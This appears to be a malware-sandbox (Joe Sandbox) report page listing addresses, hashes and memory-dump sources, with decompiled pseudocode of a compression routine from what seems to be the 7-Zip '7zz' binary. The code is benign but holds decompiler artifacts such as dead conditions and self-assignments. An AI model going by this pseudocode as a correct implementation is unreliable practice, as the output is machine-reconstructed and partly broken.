0x00435127
0x00435127
0x00435127
0x00435127
0x00435133
0x00435135
0x00435138
0x0043513a
0x00000000
0x0043513a
0x00000000
0x00434fd8
0x00434fda
0x00434fe0
0x00434fe3
0x00434fe7
0x00434ff3
0x00434ffa
0x00434ffc
0x00434ffe
0x0043509a
0x0043509c
0x0043509e
0x00000000
0x00000000
0x004350a4
0x004350a7
0x004350a9
0x004350ae
0x004350b1
0x004350b1
0x004350b1
0x004350b1
0x004350bc
0x004350be
0x004350c1
0x004350c3
0x0043513e
0x0043513e
0x00435322
0x00435322
0x00435324
0x0043532d
0x0043532d
0x00000000
0x00435324
0x0043500b
0x0043500b
0x0043500d
0x00435012
0x00435012
0x00435015
0x0043501b
0x0043501f
0x00435024
0x00435027
0x0043502b
0x0043502d
0x00435032
0x00435032
0x00435035
0x00435038
0x0043503c
0x0043503e
0x00435043
0x00435043
0x00435046
0x00435049
0x0043504d
0x0043504f
0x00435054
0x00435054
0x00435057
0x0043505a
0x0043505e
0x00435060
0x00435065
0x00435065
0x00435068
0x0043506b
0x0043506f
0x00435071
0x00435076
0x00435076
0x00435079
0x0043507c
0x00435080
0x00435082
0x00435082
0x0043508b
0x0043508b
0x00435877
0x00435877
0x00000000
0x00435877
0x00435004
0x00435004
0x00435007
0x00000000
0x00435007
0x00434fd2
0x004358a1
0x004358a5
0x004358ad
0x004358b1
0x004358b9
0x004358bd
0x004358c5
0x004358c9
0x004358d1
0x004358d5
0x004358dd
0x004358e1
0x004358e6
0x004358e6
0x004358e6
0x004358ed
0x00000000
0x00434eeb
0x00434eeb
0x00434eee
0x00434ef2
0x00434ef4
0x00434ef9
0x00434ef9
0x00434efc
0x00434eff
0x00434f03
0x00434f05
0x00434f0a
0x00434f0a
0x00434f0d
0x00434f10
0x00434f14
0x00434f16
0x00434f1b
0x00434f1b
0x00434f1e
0x00434f21
0x00434f25
0x00434f27
0x00434f2c
0x00434f2c
0x00434f2f
0x00434f32
0x00434f36
0x00434f38
0x00434f3d
0x00434f3d
0x00434f40
0x00434f43
0x00434f47
0x00434f49
0x00434f4e
0x00434f4e
0x00434f51
0x00434f56
0x00434f5b
0x00434f64
0x00434f64
0x00434ee9

APIs

__EH_prolog.LIBCMT ref: 00434D2D

Part of subcall function 004358FF: __EH_prolog.LIBCMT ref: 00435904

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ff6d11e2a075c4c8cdabb938ba6ac4d5ac1eb2450b40cc4ec04bc51db8d714f4
Instruction ID: 4d673e12acc69f6e7e4ec967f927a2294ce107ae818d378fe87eae4aebf1c3ce
Opcode Fuzzy Hash: ff6d11e2a075c4c8cdabb938ba6ac4d5ac1eb2450b40cc4ec04bc51db8d714f4
Instruction Fuzzy Hash: 91926D70D00659DFDF14DFA8C594BAEBBB4BF48304F14409AE845AB382DB38AE45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00448730 Relevance: 1.9, Strings: 1, Instructions: 670
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00448730(intOrPtr __ecx, void* __eflags) {
				void* _t321;
				unsigned int _t322;
				signed int _t331;
				signed char _t334;
				signed int _t335;
				intOrPtr* _t337;
				intOrPtr _t341;
				signed int _t342;
				signed int _t345;
				signed int _t346;
				void* _t347;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t361;
				intOrPtr* _t364;
				signed int _t368;
				char _t369;
				char _t370;
				signed int _t379;
				signed int _t382;
				signed int _t383;
				signed int* _t385;
				intOrPtr _t387;
				intOrPtr _t399;
				void* _t414;
				signed int _t417;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t429;
				char _t430;
				void* _t431;
				signed char _t433;
				intOrPtr _t444;
				signed int _t461;
				void* _t469;
				signed int* _t470;
				void* _t475;
				intOrPtr _t478;
				void* _t479;
				void* _t483;
				void* _t484;
				signed int _t498;
				signed int* _t499;
				signed char _t500;
				void* _t519;
				unsigned int _t525;
				char _t536;
				void* _t538;
				intOrPtr _t539;
				signed int* _t544;
				intOrPtr _t552;
				signed int _t565;
				signed char _t568;
				intOrPtr* _t572;
				signed int _t575;
				signed int _t576;
				intOrPtr _t585;
				intOrPtr _t586;
				signed int _t587;
				signed int _t588;
				void* _t589;
				void* _t591;
				void* _t592;
				void* _t593;
				unsigned int _t595;
				signed int _t596;
				intOrPtr _t598;
				void* _t599;
				unsigned int _t600;
				void* _t601;
				signed int _t604;
				signed int _t605;
				void* _t608;
				intOrPtr* _t609;
				intOrPtr _t610;
				void* _t611;
				intOrPtr* _t612;
				void* _t613;
				void* _t614;
				signed int _t616;
				intOrPtr _t627;
				signed int _t628;
				intOrPtr _t629;
				intOrPtr _t631;
				intOrPtr _t632;
				void* _t633;
				void* _t634;
				void* _t635;
				void* _t636;

				_t627 = __ecx;
				 *((intOrPtr*)(_t634 + 0x58)) = __ecx;
				E00448610(0);
				_t598 =  *((intOrPtr*)(_t634 + 0x680));
				_push(_t598);
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc)) + E00459170( *((intOrPtr*)(__ecx + 0xc)),  *((intOrPtr*)(_t634 + 0x67c))) * 4)) = _t598;
				E00448580(__ecx, _t318, 0x18);
				 *((intOrPtr*)(_t634 + 0x60)) = 0;
				 *((intOrPtr*)(_t634 + 0x64)) = 0;
				_t414 = 0;
				 *((intOrPtr*)(_t634 + 0x68)) = 0;
				_t321 = memset(_t634 + 0x170, 0, 0x40 << 2);
				_t635 = _t634 + 0xc;
				 *((intOrPtr*)(_t635 + 0x6c)) = 0;
				if(_t598 > 0) {
					do {
						_t321 = _t321 + 1;
						 *((char*)(_t635 + 0x170)) = 1;
					} while (_t321 < _t598);
				}
				_t322 = 0;
				do {
					if( *((intOrPtr*)(_t635 + _t322 + 0x170)) != 0) {
						 *(_t635 + _t414 + 0x70) = _t322;
						_t414 = _t414 + 1;
						 *((char*)(_t635 + (_t322 >> 4) + 0x60)) = 1;
					}
					_t322 = _t322 + 1;
				} while (_t322 < 0x100);
				_t599 = 0;
				do {
					E00448610( *((intOrPtr*)(_t635 + _t599 + 0x60)));
					_t599 = _t599 + 1;
				} while (_t599 < 0x10);
				_t600 = 0;
				do {
					if( *((intOrPtr*)(_t635 + (_t600 >> 4) + 0x60)) != 0) {
						E00448610( *((intOrPtr*)(_t635 + _t600 + 0x170)));
					}
					_t600 = _t600 + 1;
				} while (_t600 < 0x100);
				 *((intOrPtr*)(_t635 + 0x3c)) =  *((intOrPtr*)(_t627 + 4));
				memset(_t635 + 0x270, 0, 0x102 << 2);
				_t636 = _t635 + 0xc;
				_t585 =  *((intOrPtr*)(_t636 + 0x3c));
				_t601 = 0;
				_t525 = 0;
				 *(_t636 + 0x38) = _t414 + 2;
				 *(_t636 + 0x1c) = 0;
				 *((intOrPtr*)(_t636 + 0x67c)) =  *((intOrPtr*)(_t636 + 0x67c)) - 1;
				 *((intOrPtr*)(_t636 + 0x20)) =  *((intOrPtr*)(_t627 + 0xc));
				do {
					_t461 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t636 + 0x20)))) +  *((intOrPtr*)(_t636 + 0x67c))));
					_t331 = 0;
					 *(_t636 + 0x17) = _t461;
					if( *(_t636 + 0x70) != _t461) {
						do {
							_t444 =  *((intOrPtr*)(_t636 + _t331 + 0x71));
							_t331 = _t331 + 1;
						} while (_t444 != _t461);
					}
					_t417 = _t331;
					 *(_t636 + 0x2c) = _t417;
					if(_t331 >= 8) {
						_t519 = _t636 + 0x70 - 1;
						do {
							 *((char*)(_t519 + _t331 + 1)) =  *((intOrPtr*)(_t519 + _t331));
							 *((char*)(_t519 + _t331)) =  *((intOrPtr*)(_t519 + _t331 - 1));
							 *((char*)(_t519 + _t331 - 1)) =  *((intOrPtr*)(_t519 + _t331 - 2));
							 *((char*)(_t519 + _t331 - 2)) =  *((intOrPtr*)(_t519 + _t331 - 3));
							 *((char*)(_t519 + _t331 - 3)) =  *((intOrPtr*)(_t519 + _t331 - 4));
							 *((char*)(_t519 + _t331 - 4)) =  *((intOrPtr*)(_t519 + _t331 - 5));
							 *((char*)(_t519 + _t331 - 5)) =  *((intOrPtr*)(_t519 + _t331 - 6));
							 *((char*)(_t519 + _t331 - 6)) =  *((intOrPtr*)(_t519 + _t331 - 7));
							_t331 = _t331 - 8;
						} while (_t331 >= 8);
						_t417 =  *(_t636 + 0x2c);
						_t461 =  *(_t636 + 0x17);
					}
					if(_t331 > 0) {
						do {
							 *((char*)(_t636 + _t331 + 0x70)) =  *((intOrPtr*)(_t636 + _t331 + 0x6f));
							_t331 = _t331 - 1;
						} while (_t331 > 0);
						_t417 =  *(_t636 + 0x2c);
					}
					 *(_t636 + 0x70) = _t461;
					if(_t417 != 0) {
						if(_t525 != 0) {
							do {
								_t576 = _t525 - 1;
								 *(_t601 + _t585) = _t576 & 0x00000001;
								_t601 = _t601 + 1;
								_t525 = _t576 >> 1;
								 *((intOrPtr*)(_t636 + 0x270 + (_t576 & 0x00000001) * 4)) =  *((intOrPtr*)(_t636 + 0x270 + (_t576 & 0x00000001) * 4)) + 1;
							} while (_t525 != 0);
						}
						if(_t417 < 0xfe) {
							 *(_t601 + _t585) = _t417 + 1;
						} else {
							 *(_t601 + _t585) = 0xff;
							_t601 = _t601 + 1;
							 *(_t601 + _t585) = _t417 + 2;
						}
						_t601 = _t601 + 1;
						 *((intOrPtr*)(_t636 + 0x274 + _t417 * 4)) =  *((intOrPtr*)(_t636 + 0x274 + _t417 * 4)) + 1;
					} else {
						_t525 = _t525 + 1;
					}
					_t334 =  *(_t636 + 0x1c) + 1;
					 *(_t636 + 0x1c) = _t334;
					 *((intOrPtr*)(_t636 + 0x20)) =  *((intOrPtr*)(_t636 + 0x20)) + 4;
				} while (_t334 <  *((intOrPtr*)(_t636 + 0x680)));
				if(_t525 != 0) {
					do {
						_t575 = _t525 - 1;
						 *(_t601 + _t585) = _t575 & 0x00000001;
						_t601 = _t601 + 1;
						_t525 = _t575 >> 1;
						 *((intOrPtr*)(_t636 + 0x270 + (_t575 & 0x00000001) * 4)) =  *((intOrPtr*)(_t636 + 0x270 + (_t575 & 0x00000001) * 4)) + 1;
					} while (_t525 != 0);
				}
				_t335 =  *(_t636 + 0x38);
				if(_t335 >= 0x100) {
					 *(_t601 + _t585) = 0xff;
					_t601 = _t601 + 1;
					 *(_t601 + _t585) = _t335;
				} else {
					 *(_t601 + _t585) = _t335 - 1;
				}
				 *((intOrPtr*)(_t636 + 0x26c + _t335 * 4)) =  *((intOrPtr*)(_t636 + 0x26c + _t335 * 4)) + 1;
				 *((intOrPtr*)(_t636 + 0x20)) = _t601 + 1;
				_t420 = 0;
				_t337 = _t636 + 0x270;
				_t469 = 0x102;
				do {
					_t586 =  *_t337;
					_t337 = _t337 + 4;
					_t420 = _t420 + _t586;
					_t469 = _t469 - 1;
				} while (_t469 != 0);
				_t470 =  *(_t627 + 0x10);
				_t587 = 2;
				 *(_t636 + 0x5c) = _t420;
				 *(_t636 + 0x48) = 2;
				 *((intOrPtr*)(_t636 + 0x50)) = 0xffffffff;
				 *(_t636 + 0x2c) = 2;
				_t604 = 8 +  *_t470 * 8 - _t470[1];
				 *(_t636 + 0x17) = _t470[2];
				_t138 = _t420 + 0x31; // 0x31
				 *(_t636 + 0x58) = _t604;
				 *(_t636 + 0x4c) = 0x51eb851f * _t138 >> 0x20 >> 4;
				while(1) {
					_t341 =  *((intOrPtr*)(_t627 + 0x8cdc));
					if(_t341 == 0) {
						goto L44;
					}
					 *_t470 = _t604 >> 3;
					_t470[1] = 8;
					_t499 =  *(_t627 + 0x10);
					_t499[1] = 8 - (_t604 & 0x00000007);
					_t499[2] =  *(_t636 + 0x17);
					if(_t587 > 6) {
						_t342 =  *(_t636 + 0x48);
						L51:
						 *(_t636 + 0x18) = _t342;
					} else {
						 *(_t636 + 0x18) = _t587;
					}
					L52:
					_t588 =  *(_t636 + 0x18);
					E00448580(_t627, _t588, 3);
					E00448580(_t627,  *(_t636 + 0x4c), 0xf);
					_t345 = _t420;
					_t421 = 0;
					 *(_t636 + 0x1c) = _t345;
					 *(_t636 + 0x10) = 0;
					 *((intOrPtr*)(_t636 + 0x24)) = _t627 + ((_t588 << 7) + _t588) * 2 - 0xee;
					do {
						_t475 = 0;
						_t346 = _t345 / _t588;
						_t605 = _t421;
						if(_t346 > 0) {
							_t572 = _t636 + 0x270 + _t421 * 4;
							do {
								_t631 =  *_t572;
								_t572 = _t572 + 4;
								_t475 = _t475 + _t631;
								_t605 = _t605 + 1;
							} while (_t475 < _t346);
						}
						_t173 = _t605 - 1; // 0x0
						_t628 = _t173;
						if(_t628 > _t421 && _t588 !=  *(_t636 + 0x18) && _t588 != 1 && ( *(_t636 + 0x10) & 0x00000001) == 1) {
							_t605 = _t628;
							_t475 = _t475 -  *((intOrPtr*)(_t636 + 0x270 + _t605 * 4));
						}
						_t629 =  *((intOrPtr*)(_t636 + 0x24));
						_t347 = 0;
						do {
							if(_t347 < _t421 || _t347 >= _t605) {
								_t536 = 1;
							} else {
								_t536 = 0;
							}
							 *((char*)(_t347 + _t629)) = _t536;
							_t347 = _t347 + 1;
						} while (_t347 <  *(_t636 + 0x38));
						_t421 = _t605;
						_t345 =  *(_t636 + 0x1c) - _t475;
						_t588 = _t588 - 1;
						 *(_t636 + 0x1c) = _t345;
						 *(_t636 + 0x10) =  *(_t636 + 0x10) + 1;
						 *((intOrPtr*)(_t636 + 0x24)) = _t629 - 0x102;
					} while (_t588 != 0);
					_t632 =  *((intOrPtr*)(_t636 + 0x54));
					 *(_t636 + 0x28) = 4;
					do {
						_t422 =  *(_t636 + 0x18);
						_t538 = 0;
						_t608 = _t632 + 0x620;
						do {
							_t589 = _t608;
							_t538 = _t538 + 1;
							_t608 = _t608 + 0x408;
							memset(_t589, 0, 0x102 << 2);
							_t636 = _t636 + 0xc;
						} while (_t538 < _t422);
						_t478 = 0;
						 *((intOrPtr*)(_t636 + 0x34)) = 0;
						 *(_t636 + 0x1c) = _t632 + 0x3680;
						do {
							_t539 =  *((intOrPtr*)(_t636 + 0x3c));
							_t591 = 0;
							_t609 = _t636 + 0x70;
							do {
								_t353 =  *((intOrPtr*)(_t478 + _t539));
								_t478 = _t478 + 1;
								if(0 >= 0xff) {
									_t353 = 0;
									_t478 = _t478 + 1;
								}
								 *_t609 = _t353;
								_t591 = _t591 + 1;
								_t609 = _t609 + 4;
							} while (_t591 < 0x32 && _t478 <  *((intOrPtr*)(_t636 + 0x20)));
							 *((intOrPtr*)(_t636 + 0x30)) = _t478;
							 *((intOrPtr*)(_t636 + 0x24)) = 0xffffffff;
							 *(_t636 + 0x10) = 0;
							_t633 = _t632 + 0x14;
							do {
								_t610 = 0;
								_t354 = 0;
								_t479 = _t636 + 0x70;
								do {
									_t479 = _t479 + 4;
									_t610 = _t610;
									_t354 = _t354 + 1;
								} while (_t354 < _t591);
								if(_t610 <  *((intOrPtr*)(_t636 + 0x24))) {
									 *((intOrPtr*)(_t636 + 0x24)) = _t610;
									 *( *(_t636 + 0x1c)) =  *(_t636 + 0x10);
								}
								_t356 =  *(_t636 + 0x10) + 1;
								_t633 = _t633 + 0x102;
								 *(_t636 + 0x10) = _t356;
							} while (_t356 <  *(_t636 + 0x18));
							_t632 =  *((intOrPtr*)(_t636 + 0x54));
							_t611 = _t632 + 0x5d6e388;
							 *((intOrPtr*)(_t636 + 0x34)) =  *((intOrPtr*)(_t636 + 0x34)) + 1;
							 *(_t636 + 0x1c) =  *(_t636 + 0x1c) + 1;
							_t483 = 0;
							_t544 = _t636 + 0x70;
							do {
								_t361 =  *_t544;
								_t544 =  &(_t544[1]);
								_t483 = _t483 + 1;
								 *((intOrPtr*)(_t611 + _t361 * 4)) =  *((intOrPtr*)(_t611 + _t361 * 4)) + 1;
							} while (_t483 < _t591);
							_t478 =  *((intOrPtr*)(_t636 + 0x30));
						} while (_t478 <  *((intOrPtr*)(_t636 + 0x20)));
						_t592 = 0;
						_t429 = _t632 + 0x14;
						_t612 = _t632 + 0x620;
						do {
							_t484 = 0;
							_t364 = _t612;
							do {
								if( *_t364 == 0) {
									 *_t364 = 1;
								}
								_t484 = _t484 + 1;
								_t364 = _t364 + 4;
							} while (_t484 <  *(_t636 + 0x38));
							_push(0x10);
							_push(0x102);
							_push(_t429);
							E00459960(_t612, _t612 + 0x1830);
							_t592 = _t592 + 1;
							_t429 = _t429 + 0x102;
							_t612 = _t612 + 0x408;
						} while (_t592 <  *(_t636 + 0x18));
						_t368 =  *(_t636 + 0x28) - 1;
						 *(_t636 + 0x28) = _t368;
					} while (_t368 != 0);
					_t369 = 0;
					do {
						 *((char*)(_t636 + _t369 + 0x40)) = _t369;
						_t369 = _t369 + 1;
					} while (_t369 <  *(_t636 + 0x18));
					_t370 =  *((intOrPtr*)(_t636 + 0x40));
					_t593 = 0;
					do {
						_t430 =  *((intOrPtr*)(_t593 + _t632 + 0x3680));
						_t613 = 0;
						if(_t370 != _t430) {
							do {
								E00448610(1);
								_t399 =  *((intOrPtr*)(_t636 + _t613 + 0x41));
								_t613 = _t613 + 1;
							} while (_t399 != _t430);
						}
						E00448610(0);
						while(_t613 > 0) {
							 *((char*)(_t636 + _t613 + 0x40)) =  *((intOrPtr*)(_t636 + _t613 + 0x3f));
							_t613 = _t613 - 1;
						}
						_t593 = _t593 + 1;
						_t370 = _t430;
						 *((char*)(_t636 + 0x40)) = _t370;
					} while (_t593 <  *(_t636 + 0x4c));
					 *(_t636 + 0x28) = 0;
					 *(_t636 + 0x10) = _t632 + 0x14;
					do {
						_t614 = 0;
						E00448580(_t632, 0, 5);
						_t431 = 0;
						do {
							while(_t614 != 0) {
								E00448610(1);
								if(_t614 >= 0) {
									E00448610(1);
									_t614 = _t614 - 1;
								} else {
									E00448610(0);
									_t614 = _t614 + 1;
								}
							}
							E00448610(0);
							_t431 = _t431 + 1;
						} while (_t431 <  *(_t636 + 0x38));
						_t379 =  *(_t636 + 0x28) + 1;
						 *(_t636 + 0x28) = _t379;
						 *(_t636 + 0x10) =  *(_t636 + 0x10) + 0x102;
					} while (_t379 <  *(_t636 + 0x18));
					 *((intOrPtr*)(_t636 + 0x30)) = 0;
					 *((intOrPtr*)(_t636 + 0x34)) = 0;
					 *((intOrPtr*)(_t636 + 0x24)) = 0;
					 *(_t636 + 0x10) = 0;
					 *(_t636 + 0x28) = _t632 + 0x3680;
					do {
						_t382 =  *(_t636 + 0x10);
						_t498 =  *((intOrPtr*)(_t382 +  *((intOrPtr*)(_t636 + 0x3c))));
						_t383 = _t382 + 1;
						 *(_t636 + 0x10) = _t383;
						if(0 >= 0xff) {
							_t498 = 0;
							 *(_t636 + 0x10) = _t383 + 1;
						}
						_t552 =  *((intOrPtr*)(_t636 + 0x30));
						if(_t552 == 0) {
							_t552 = 0x32;
							 *(_t636 + 0x28) =  *(_t636 + 0x28) + 1;
							 *((intOrPtr*)(_t636 + 0x34)) = _t632 + 0x175b76e;
							 *((intOrPtr*)(_t636 + 0x24)) = _t632 + 0x5d6fbb8;
						}
						 *((intOrPtr*)(_t636 + 0x30)) = _t552 - 1;
						_t385 =  *(_t632 + 0x10);
						_t616 = 0;
						_t595 =  *( *((intOrPtr*)(_t636 + 0x24)) + _t498 * 4);
						if(0 > 0) {
							do {
								_t500 = _t385[1];
								if(_t616 < _t500) {
									_t500 = _t616;
								}
								_t616 = _t616 - _t500;
								 *(_t636 + 0x1c) = _t500;
								_t385[2] = _t385[2] << _t500;
								_t565 = _t595 >> _t616;
								_t433 = _t565 | _t385[2];
								_t385[2] = _t433;
								_t595 = _t595 - (_t565 << _t616);
								_t568 = _t385[1] -  *(_t636 + 0x1c);
								_t385[1] = _t568;
								if(_t568 == 0) {
									 *(_t385[3] +  *_t385) = _t433;
									_t385[1] = 8;
									 *_t385 =  *_t385 + 1;
								}
							} while (_t616 > 0);
						}
					} while ( *(_t636 + 0x10) <  *((intOrPtr*)(_t636 + 0x20)));
					_t387 =  *((intOrPtr*)(_t632 + 0x8cdc));
					if(_t387 != 0) {
						_t470 =  *(_t632 + 0x10);
						_t604 =  *(_t636 + 0x58);
						_t596 =  *(_t636 + 0x2c);
						_t387 = 8 +  *_t470 * 8 - _t470[1] - _t604;
						if(_t387 >  *((intOrPtr*)(_t636 + 0x50))) {
							L126:
							_t587 = _t596 + 1;
							 *(_t636 + 0x2c) = _t587;
							if(_t587 <= 7) {
								_t420 =  *(_t636 + 0x5c);
								continue;
							}
						} else {
							if(_t596 != 6) {
								 *((intOrPtr*)(_t636 + 0x50)) = _t387;
								 *(_t636 + 0x48) = _t596;
								goto L126;
							}
						}
					}
					return _t387;
					L44:
					if(_t420 >= 0xc8) {
						if(_t420 >= 0x258) {
							if(_t420 >= 0x4b0) {
								asm("sbb eax, eax");
								_t342 = _t341 + 6;
								goto L51;
							} else {
								 *(_t636 + 0x18) = 4;
							}
						} else {
							 *(_t636 + 0x18) = 3;
						}
					} else {
						 *(_t636 + 0x18) = 2;
					}
					goto L52;
				}
			}

0x0044873a
0x0044873e
0x00448742
0x00448747
0x00448758
0x00448764
0x00448769
0x00448775
0x00448782
0x00448786
0x00448788
0x0044878c
0x0044878c
0x00448790
0x00448796
0x00448798
0x004487a4
0x004487a7
0x004487a7
0x00448798
0x004487b0
0x004487b2
0x004487bb
0x004487bf
0x004487c6
0x004487c7
0x004487c7
0x004487cb
0x004487cc
0x004487d3
0x004487d5
0x004487dc
0x004487e1
0x004487e2
0x004487e7
0x004487e9
0x004487f4
0x00448800
0x00448800
0x00448805
0x00448806
0x00448816
0x00448826
0x00448826
0x00448832
0x00448836
0x00448838
0x0044883b
0x0044883f
0x00448843
0x0044884a
0x0044884e
0x0044885f
0x00448862
0x00448866
0x0044886a
0x0044886c
0x0044886c
0x00448870
0x00448871
0x0044886c
0x00448875
0x0044887a
0x0044887e
0x00448884
0x00448885
0x00448888
0x00448890
0x00448897
0x0044889f
0x004488a7
0x004488af
0x004488b7
0x004488bf
0x004488c3
0x004488c6
0x004488cb
0x004488cf
0x004488cf
0x004488d5
0x004488d7
0x004488db
0x004488df
0x004488e0
0x004488e4
0x004488e4
0x004488ea
0x004488ee
0x004488f5
0x004488f7
0x004488f7
0x00448901
0x00448904
0x00448914
0x00448916
0x00448916
0x004488f7
0x00448920
0x00448934
0x00448922
0x00448922
0x00448928
0x0044892b
0x0044892b
0x00448945
0x00448947
0x004488f0
0x004488f0
0x004488f0
0x00448958
0x0044895e
0x00448962
0x00448962
0x0044896e
0x00448970
0x00448970
0x0044897a
0x0044897d
0x0044898d
0x0044898f
0x0044898f
0x00448970
0x00448993
0x0044899c
0x004489a7
0x004489ab
0x004489ac
0x0044899e
0x004489a2
0x004489a2
0x004489bf
0x004489c1
0x004489c5
0x004489c7
0x004489ce
0x004489d3
0x004489d3
0x004489d5
0x004489d8
0x004489da
0x004489da
0x004489dd
0x004489e0
0x004489e5
0x004489e9
0x004489f2
0x004489fa
0x00448a0a
0x00448a0f
0x00448a13
0x00448a1b
0x00448a1f
0x00448a29
0x00448a29
0x00448a31
0x00000000
0x00000000
0x00448a3c
0x00448a4b
0x00448a4e
0x00448a51
0x00448a54
0x00448a57
0x00448a5f
0x00448aa6
0x00448aa6
0x00448a59
0x00448a59
0x00448a59
0x00448aaa
0x00448aaa
0x00448ab3
0x00448ac1
0x00448ac8
0x00448acd
0x00448ad1
0x00448ad5
0x00448ae0
0x00448ae4
0x00448ae6
0x00448ae8
0x00448aea
0x00448aee
0x00448af0
0x00448af7
0x00448af7
0x00448af9
0x00448afc
0x00448afe
0x00448aff
0x00448af7
0x00448b03
0x00448b03
0x00448b08
0x00448b21
0x00448b23
0x00448b23
0x00448b2a
0x00448b2e
0x00448b30
0x00448b32
0x00448b3c
0x00448b38
0x00448b38
0x00448b38
0x00448b41
0x00448b48
0x00448b49
0x00448b51
0x00448b57
0x00448b59
0x00448b61
0x00448b67
0x00448b6b
0x00448b6b
0x00448b75
0x00448b79
0x00448b81
0x00448b81
0x00448b85
0x00448b87
0x00448b8d
0x00448b8f
0x00448b91
0x00448b97
0x00448b9f
0x00448b9f
0x00448b9f
0x00448ba3
0x00448bab
0x00448baf
0x00448bb3
0x00448bb3
0x00448bb7
0x00448bb9
0x00448bbd
0x00448bbf
0x00448bc2
0x00448bc8
0x00448bcf
0x00448bd1
0x00448bd1
0x00448bd2
0x00448bd4
0x00448bd5
0x00448bd8
0x00448be3
0x00448be7
0x00448bef
0x00448bf7
0x00448bfa
0x00448bfa
0x00448bfc
0x00448bfe
0x00448c02
0x00448c06
0x00448c0c
0x00448c0e
0x00448c0f
0x00448c17
0x00448c21
0x00448c25
0x00448c25
0x00448c2f
0x00448c30
0x00448c38
0x00448c38
0x00448c3e
0x00448c5c
0x00448c63
0x00448c67
0x00448c6b
0x00448c6d
0x00448c71
0x00448c71
0x00448c73
0x00448c7d
0x00448c80
0x00448c80
0x00448c84
0x00448c8c
0x00448c94
0x00448c96
0x00448c99
0x00448c9f
0x00448c9f
0x00448ca1
0x00448ca3
0x00448ca6
0x00448ca8
0x00448ca8
0x00448cb2
0x00448cb3
0x00448cb6
0x00448cba
0x00448cbc
0x00448cc1
0x00448cca
0x00448cd3
0x00448cd4
0x00448cda
0x00448ce0
0x00448ce8
0x00448ce9
0x00448ce9
0x00448cf3
0x00448cf5
0x00448cf9
0x00448cfd
0x00448cfe
0x00448d02
0x00448d06
0x00448d08
0x00448d08
0x00448d0f
0x00448d13
0x00448d15
0x00448d19
0x00448d1e
0x00448d22
0x00448d23
0x00448d15
0x00448d2b
0x00448d32
0x00448d38
0x00448d3c
0x00448d3d
0x00448d45
0x00448d46
0x00448d4a
0x00448d4a
0x00448d53
0x00448d5b
0x00448d5f
0x00448d6b
0x00448d6e
0x00448d73
0x00448d75
0x00448d82
0x00448d88
0x00448d8f
0x00448da1
0x00448da6
0x00448d91
0x00448d95
0x00448d9a
0x00448d9a
0x00448da7
0x00448daf
0x00448db8
0x00448db9
0x00448dc9
0x00448dd2
0x00448dd6
0x00448dd6
0x00448dde
0x00448de2
0x00448de6
0x00448dea
0x00448df4
0x00448df8
0x00448df8
0x00448e02
0x00448e05
0x00448e0c
0x00448e10
0x00448e17
0x00448e1a
0x00448e1a
0x00448e1e
0x00448e24
0x00448e2c
0x00448e34
0x00448e43
0x00448e55
0x00448e55
0x00448e5e
0x00448e67
0x00448e6a
0x00448e72
0x00448e75
0x00448e77
0x00448e77
0x00448e7c
0x00448e7e
0x00448e7e
0x00448e83
0x00448e87
0x00448e8d
0x00448e92
0x00448e99
0x00448ea3
0x00448ea6
0x00448eab
0x00448ead
0x00448eb0
0x00448eb7
0x00448ebd
0x00448ec4
0x00448ec4
0x00448ec6
0x00448e77
0x00448ed2
0x00448eda
0x00448ee2
0x00448ee4
0x00448ee7
0x00448eef
0x00448f01
0x00448f05
0x00448f14
0x00448f14
0x00448f18
0x00448f1c
0x00448a25
0x00000000
0x00448a25
0x00448f07
0x00448f0a
0x00448f0c
0x00448f10
0x00000000
0x00448f10
0x00448f0a
0x00448f05
0x00448f2c
0x00448a65
0x00448a6b
0x00448a7d
0x00448a8f
0x00448aa1
0x00448aa3
0x00000000
0x00448a91
0x00448a91
0x00448a91
0x00448a7f
0x00448a7f
0x00448a7f
0x00448a6d
0x00448a6d
0x00448a6d
0x00000000
0x00448a6b

Strings

YA1, xrefs: 00448736

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID: YA1
API String ID: 0-613462611
Opcode ID: 40c36dd2d9e12414e66adf71fdb657f7f3508d8c1f6a41737e3c26815d29bb3b
Instruction ID: 099bcbc28d88e1846a75dfe823cd1f8e9a6e0cdfc63d5bc2b083594896ecf992
